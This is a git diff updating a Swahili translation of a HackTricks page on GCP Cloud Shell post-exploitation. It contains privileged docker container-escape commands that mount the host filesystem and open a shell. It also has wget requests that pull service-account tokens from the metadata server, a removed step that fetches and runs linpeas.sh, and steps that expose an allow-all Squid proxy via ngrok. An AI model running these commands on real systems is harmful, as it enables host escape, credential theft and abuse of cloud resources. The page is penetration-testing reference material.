mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2025-12-12 07:40:49 -08:00
Translated ['', 'src/pentesting-cloud/gcp-security/gcp-post-exploitation
This commit is contained in:
Translator
@@ -4,46 +4,46 @@
|
|||||||
|
|
||||||
## Cloud Shell
|
## Cloud Shell
|
||||||
|
|
||||||
Kwa habari zaidi kuhusu Cloud Shell angalia:
|
Kwa taarifa zaidi kuhusu Cloud Shell angalia:
|
||||||
|
|
||||||
{{#ref}}
|
{{#ref}}
|
||||||
../gcp-services/gcp-cloud-shell-enum.md
|
../gcp-services/gcp-cloud-shell-enum.md
|
||||||
{{#endref}}
|
{{#endref}}
|
||||||
|
|
||||||
### Container Escape
|
### Inapata token ya mtumiaji kutoka metadata
|
||||||
|
|
||||||
Kumbuka kwamba Google Cloud Shell inaendesha ndani ya container, unaweza **easily escape to the host** kwa kufanya:
|
Kwa kuwasiliana tu na metadata server unaweza kupata token ya kuingia kama mtumiaji aliyesajiliwa sasa:
|
||||||
|
```bash
|
||||||
|
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
|
||||||
|
```
|
||||||
|
### Container Escape / Docker use
|
||||||
|
|
||||||
|
> [!WARNING]
|
||||||
|
> Hapo awali, cloud shell ilikuwa ikikimbia ndani ya container iliyo na ufikiaji wa docker socket ya host. Sasa Google imebadilisha usanifu, na container ya cloud shell sasa inaendesha muundo wa "Docker in a container". Kwa hivyo hata ikiwa inawezekana kutumia docker kutoka cloud shell, hutaweza kutoroka kwenda host kwa kutumia docker socket.
|
||||||
|
> Kumbuka kwamba hapo awali faili ya `docker.sock` ilikuwa imewekwa katika `/google/host/var/run/docker.sock`, lakini sasa imehamishwa hadi `/run/docker.sock`.
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary>Container escape commands</summary>
|
<summary>Docker use / Old container escape commands</summary>
|
||||||
```bash
|
```bash
|
||||||
sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
|
sudo docker -H unix:///run/docker.sock pull alpine:latest
|
||||||
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
|
sudo docker -H unix:///run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
|
||||||
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
|
sudo docker -H unix:///run/docker.sock start escaper
|
||||||
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh
|
sudo docker -H unix:///run/docker.sock exec -it escaper /bin/sh
|
||||||
```
|
```
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
Hii haichukuliwi kama udhaifu na google, lakini inakupa mtazamo mpana wa kile kinachotokea katika mazingira hayo.
|
Zaidi ya hayo, hapo zamani ilikuwa inawezekana kupata token kwa service account iliyotumiwa na cloud shell VM kwenye metadata server:
|
||||||
|
|
||||||
Zaidi ya hayo, zingatia kwamba kutoka kwenye host unaweza kupata service account token:
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary>Pata service account kutoka metadata</summary>
|
<summary>Service account ya zamani kutoka metadata</summary>
|
||||||
```bash
|
```bash
|
||||||
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
|
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
|
||||||
default/
|
default/
|
||||||
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/
|
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/
|
||||||
```
|
```
|
||||||
</details>
|
Kwa scopes zifuatazo:
|
||||||
|
|
||||||
Kwa ruhusa zifuatazo:
|
|
||||||
|
|
||||||
<details>
|
|
||||||
|
|
||||||
<summary>Pata ruhusa za akaunti ya huduma</summary>
|
|
||||||
```bash
|
```bash
|
||||||
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"
|
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"
|
||||||
|
|
||||||
@@ -53,23 +53,11 @@ https://www.googleapis.com/auth/monitoring.write
|
|||||||
```
|
```
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
Orodhesha metadata na LinPEAS:
|
|
||||||
|
|
||||||
<details>
|
|
||||||
|
|
||||||
<summary>Orodhesha metadata na LinPEAS</summary>
|
|
||||||
```bash
|
|
||||||
cd /tmp
|
|
||||||
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
|
|
||||||
sh linpeas.sh -o cloud
|
|
||||||
```
|
|
||||||
</details>
|
|
||||||
|
|
||||||
Baada ya kutumia [https://github.com/carlospolop/bf_my_gcp_permissions](https://github.com/carlospolop/bf_my_gcp_permissions) na token ya Service Account **hakuna ruhusa iliyogunduliwa**...
|
|
||||||
|
|
||||||
### Tumia kama Proxy
|
### Tumia kama Proxy
|
||||||
|
|
||||||
Ikiwa unataka kutumia google cloud shell instance yako kama proxy, unahitaji kuendesha amri zifuatazo (au kuziongeza kwenye faili .bashrc):
|
Ikiwa unataka kutumia instance yako ya google cloud shell kama proxy unahitaji kuendesha amri zifuatazo (au uziingize kwenye faili .bashrc):
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
@@ -79,7 +67,7 @@ sudo apt install -y squid
|
|||||||
```
|
```
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
Kwa taarifa tu, Squid ni http proxy server. Unda faili **squid.conf** na mipangilio ifuatayo:
|
Kwa taarifa, Squid ni http proxy server. Unda faili **squid.conf** na mipangilio ifuatayo:
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
@@ -92,45 +80,43 @@ http_access allow all
|
|||||||
```
|
```
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
nakili faili **squid.conf** kwenda **/etc/squid**
|
nakili faili ya **squid.conf** hadi **/etc/squid**
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary>Nakili config kwenda /etc/squid</summary>
|
<summary>Nakili config kwenye /etc/squid</summary>
|
||||||
```bash
|
```bash
|
||||||
sudo cp squid.conf /etc/squid
|
sudo cp squid.conf /etc/squid
|
||||||
```
|
```
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
Hatimaye, endesha huduma ya Squid:
|
Hatimaye endesha huduma ya squid:
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary>Anzisha huduma ya Squid</summary>
|
<summary>Anzisha huduma ya squid</summary>
|
||||||
```bash
|
```bash
|
||||||
sudo service squid start
|
sudo service squid start
|
||||||
```
|
```
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
Tumia ngrok ili proxy iweze kupatikana kutoka nje:
|
Tumia ngrok ili proxy ipatikane kutoka nje:
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary>Fungua proxy kwa ngrok</summary>
|
<summary>Fungua proxy kwa kutumia ngrok</summary>
|
||||||
```bash
|
```bash
|
||||||
./ngrok tcp 3128
|
./ngrok tcp 3128
|
||||||
```
|
```
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
Baada ya kuendesha, nakili URL ya tcp://.
|
Baada ya kuendesha, nakili URL ya tcp://. Ikiwa unataka kuendesha proxy kutoka kwa kivinjari, inapendekezwa kuondoa sehemu ya tcp:// na port, kisha weka port katika uwanja wa port wa mipangilio ya proxy wa kivinjari chako (squid ni http proxy server).
|
||||||
|
|
||||||
Iwapo unataka kuendesha proxy kutoka kwa kivinjari, inashauriwa kuondoa sehemu ya tcp:// na port, kisha kuweka port katika shamba la port la mipangilio ya proxy ya kivinjari chako (squid ni http proxy server).
|
Ili matumizi bora wakati wa kuanzisha, faili .bashrc inapaswa kuwa na mistari zifuatazo:
|
||||||
|
|
||||||
Kwa matumizi bora wakati wa kuanzisha, faili .bashrc inapaswa kuwa na mistari ifuatayo:
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary>Ongeza kwenye .bashrc kwa kuanza kiotomatiki</summary>
|
<summary>Ongeza kwenye .bashrc kwa kuanzisho kiotomatiki</summary>
|
||||||
```bash
|
```bash
|
||||||
sudo apt install -y squid
|
sudo apt install -y squid
|
||||||
sudo cp squid.conf /etc/squid/
|
sudo cp squid.conf /etc/squid/
|
||||||
@@ -139,6 +125,6 @@ cd ngrok;./ngrok tcp 3128
|
|||||||
```
|
```
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
Maelekezo yamekopwa kutoka [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key). Angalia ukurasa huo kwa mawazo mengine ya ajabu ya kuendesha aina yoyote ya software (databases na hata windows) katika Cloud Shell.
|
Maelekezo yalichukuliwa kutoka [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key). Angalia ukurasa huo kupata mawazo mengine ya wazimu ya kuendesha aina yoyote ya programu (databases na hata windows) katika Cloud Shell.
|
||||||
|
|
||||||
{{#include ../../../banners/hacktricks-training.md}}
|
{{#include ../../../banners/hacktricks-training.md}}
|
||||||
|
|||||||
Reference in New Issue
Block a user